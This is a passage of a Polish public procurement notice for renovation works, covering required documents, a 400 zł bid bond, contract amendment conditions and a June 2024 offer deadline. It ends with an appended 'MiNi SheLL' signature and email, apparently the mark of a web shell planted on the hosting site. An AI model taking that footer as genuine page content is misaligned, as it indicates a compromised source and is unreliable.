wykonania.<br/>b) Wykaz osób zdolnych do wykonania zamówienia<br/>Ogłoszenie nr 2023/BZP 00376450 z dnia 2023-08-31<br/>2023-</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty, które należy złożyć wraz z ofertą – Formularzem ofertowym stanowiącym oświadczenie woli wykonawcy<br/>1) Dokument albo dokumenty potwierdzające umocowanie – np. odpisy z właściwych rejestrów lub pełnomocnictwa (jeżeli<br/>są niezbędne zgodnie z postanowieniami SWZ);<br/>2) Formularz cenowy Wykonawcy<br/>a) Wypełniony formularz stanowi część oferty (Oświadczenia woli wykonawcy),<br/>b) dokument stanowi podstawę ustalania wysokości ceny oferty,<br/>c) wykonawca zobowiązany jest wskazać ceny jednostkowe poszczególnych świadczeń, stawki podatku VAT oraz<br/>wyliczenie całkowitej wartości zamówienia,<br/>d) Zamawiający przedkłada wzór Formularza cenowego, który stanowi Załącznik nr 1 do części III SWZ – „Opis przedmiotu<br/>zamówienia”.<br/>3) Oświadczenie wstępne – o którym mowa w art. 125 ust. 1 ustawy Pzp. –<br/>e) oświadczenie w zakresie braku podstaw do wykluczenia z postępowania składają wykonawcy, członkowie konsorcjum<br/>(jeżeli ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia), podmioty udostępniające zasoby (jeżeli<br/>wykonawca polega na zdolnościach innych podmiotów),<br/>f) oświadczenie w zakresie spełnienia warunków udziału w postępowaniu składają wykonawcy, członkowie konsorcjum albo<br/>podmioty udostępniające zasoby – w zakresie w jakim zobowiązani są udowodnić spełnienie określonych warunków.<br/>g) Zamawiający przedkłada wzór Oświadczenia wstępnego, który stanowi Załącznik nr 2 Do SWZ.<br/>4) Oświadczenie wykonawców wspólnie ubiegających się o udzielnie zamówienia – (oświadczenie należy złożyć wyłącznie<br/>w przypadku wspólnego ubiegania się o udzielenie zamówienia (dotyczy tylko konsorcjum).<br/>a) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>b) Zamawiający przedkłada wzór Oświadczenia wykonawców wspólnie ubiegających się o wykonanie zamówienia który<br/>stanowi Załącznik nr 3 Do SWZ.<br/>5) Zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu.<br/>a) Dokument należy złożyć tylko, gdy wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby<br/>zgonie z art. 118 ustawy Pzp.<br/>b) Zamawiający przedkłada wzór Zobowiązania podmiotu udostępniającego zasoby, który stanowi Załącznik nr 4 Do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawcy zobowiązani są do wniesienia wadium w wysokości 400,00 zł (słownie złotych: czterysta).<br/>2)	Wadium należy wnieść przed upływem terminu składania ofert.<br/>3)	Wadium powinno być utrzymywane nieprzerwanie przez cały okres związania ofertą lub do zawarcia umowy albo unieważnienia postępowania, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>4)	Wadium może zostać wniesione według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2024 r. poz. 419).<br/>5)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy nr 12 1010 1599 0033 6213 9120 0000 w NBP O/ Szczecin.<br/>6)	W przypadku wnoszenia wadium w pieniądzu Wykonawca zobowiązany jest zapewnić, aby dane wynikające z potwierdzenia przelewu umożliwiały prawidłową identyfikację wykonawcy, którego oferta podlega zabezpieczeniu oraz postępowania, w zakresie którego wadium zostało wniesione (np. poprzez wskazanie numeru postępowania oraz nazwy wykonawcy w tytule).<br/>7)	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>8)	W przypadku, gdy wykonawca wnosi wadium w formie gwarancji lub poręczenia: <br/>a)	dokument sporządzony w języku obcym należy złożyć wraz z tłumaczeniem na język polski<br/>b)	zobowiązania podlegać muszą prawu polskiemu; wszystkie spory dotyczące stosunku gwarancji będą rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji sądów polskich.<br/>c)	z dokumentu wadialnego musi wynikać zobowiązanie gwaranta lub poręczyciela do zapłaty całej kwoty wadium nieodwołanie i bezwarunkowo na pierwsze żądanie zamawiającego zawierające oświadczenie, że zaistniały okoliczności, o których mowa w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu lub do zawarcia umowy.<br/>2) Korespondencję skierowaną do Konsorcjum w postępowaniu zamawiający przekazuje za pośrednictwem pełnomocnika.<br/>3) Wspólników spółki cywilnej uważa się za wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4) Przed zawarciem umowy, w przypadku wybrania oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>będą oni mieli obowiązek przedstawić zamawiającemu kopię umowy regulującej współpracę tych wykonawców (umowa<br/>konsorcjum)<br/>5) Wraz z ofertą należy złożyć Oświadczenie wykonawców wspólnie ubiegających się o udzielnie zamówienia –<br/>(oświadczenie należy złożyć wyłącznie w przypadku wspólnego ubiegania się o udzielenie zamówienia (dotyczy tylko<br/>konsorcjum)<br/>a) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień umowy polegających na:<br/>1)	zmianie wysokości wynagrodzenia umownego w następujących warunkach:<br/>a)	w związku z dokonaną zgodnie z umową zmianą sposobu spełnienia świadczenia lub zmianą zakresu świadczenia, w tym w związku z koniecznością: rozszerzenia lub ograniczenia zakresu robót albo wprowadzenia robót zamiennych. Zmiany wynagrodzenia umownego zostaną rozliczone przy uwzględnieniu rzeczywistych nakładów materiałowych oraz pracy, wycenionych w szczególności w oparciu o stawki wskazane w przedłożonym przez Wykonawcę kosztorysie ofertowym.<br/>b)	gdy konieczność wprowadzenia modyfikacji wysokości wynagrodzenia wyniknie ze zmiany powszechnie obowiązujących przepisów prawa – np. dotyczących obowiązujących stawek podatku VAT;<br/>2)	zmianie sposobu spełnienia lub zakresu świadczenia w następujących warunkach:<br/>a)	gdy konieczność wprowadzenia modyfikacji wyniknie ze zmiany powszechnie obowiązujących przepisów prawa, na mocy których na Zamawiającego lub Wykonawcę nałożony zostanie obowiązek zrealizowania przedmiotu zamówienia w sposób różniący się od zaoferowanego w ofercie, pod warunkiem że treść zmiany przepisów nie była uchwalona przed wszczęciem postępowania o udzielenie zamówienia, w wyniku którego zawarto niniejszą umowę;<br/>b)	gdy wystąpią nieprzewidziane okoliczności polegające na odkryciu niezinwentaryzowanych obiektów lub elementów instalacji);<br/>c)	gdy po wykonaniu robót rozbiórkowych lub wyburzeniowych zostanie ujawniona konieczność zrealizowania prac nie ujętych w opisie przedmiotu zamówienia, których wykonanie będzie niezbędne do prawidłowego ukończenia remontu;<br/>d)	gdy podczas realizacji przedmiotu zamówienia ulegnie zmianie technologia wykonywania robót na lepszą funkcjonalnie od technologii przewidzianej w ofercie, pod warunkiem, iż nie spowoduje to zwiększenia kosztów realizacji robót, a Wykonawca przed zmianą umowy przedłoży do zaakceptowania Zamawiającemu projekt przewidywanych zmian wraz z kosztorysem;<br/>e) w przypadku konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych, z uwagi na czasową lub całkowitą niedostępność materiałów (np. zaprzestania produkcji),<br/>3)	terminów umownych, a w tym rozpoczęcia i zakończenia realizacji przedmiotu umowy, terminów przystąpienia do odbiorów albo terminów płatności wynagrodzenia – w następujących warunkach:<br/>a)	w przypadku, gdy nastąpi zmiana stanu prawnego lub powszechnie obowiązujących przepisów prawa, mająca wpływ na terminy realizacji przedmiotu umowy;<br/>b)	w związku z dokonaną zgodnie z umową zmianą sposobu spełnienia świadczenia lub zmianą zakresu świadczenia, jeżeli spowodują one konieczność modyfikacji jednego z terminów umownych;<br/>c)	w sytuacji, gdy wystąpią warunki atmosferyczne, uniemożliwiające lub znacznie utrudniające prowadzenie robót budowlanych zgodnie z technologią przewidzianą w dokumentacji zamówienia i warunkach Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych;<br/>d)	w sytuacji, gdy wystąpi konieczność usunięcia błędów lub wprowadzenia zmian w STWiORB lub przedmiarze robót;<br/>2.	Zmiany terminów umownych, a w tym także terminów odbiorów oraz płatności wynagrodzenia mogą występować jedynie w wymiarze odpowiadającym wpływowi okoliczności, których wystąpienie stanowiło podstawę do ich dokonania.<br/>3.	Podstawą wprowadzenia istotnej zmiany umowy będzie protokół zatwierdzony przez Zamawiającego i Wykonawcę zawierający wskazanie szczegółowych przesłanek lub danych niezbędnych do uzasadnienia dokonania modyfikacji umowy.<br/>4.	Zmiany do umowy może inicjować zarówno Zamawiający jak i Wykonawca, składając pisemny wniosek do drugiej strony, zawierający w szczególności opis zmiany i jej uzasadnienie.<br/>5.	Wszystkie okoliczności wymienione w niniejszym paragrafie stanowią katalog zmian, na które Zamawiający może wyrazić zgodę w formie pisemnej. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>6.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-10 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">na Platformie e-zamówienia: https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-10 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com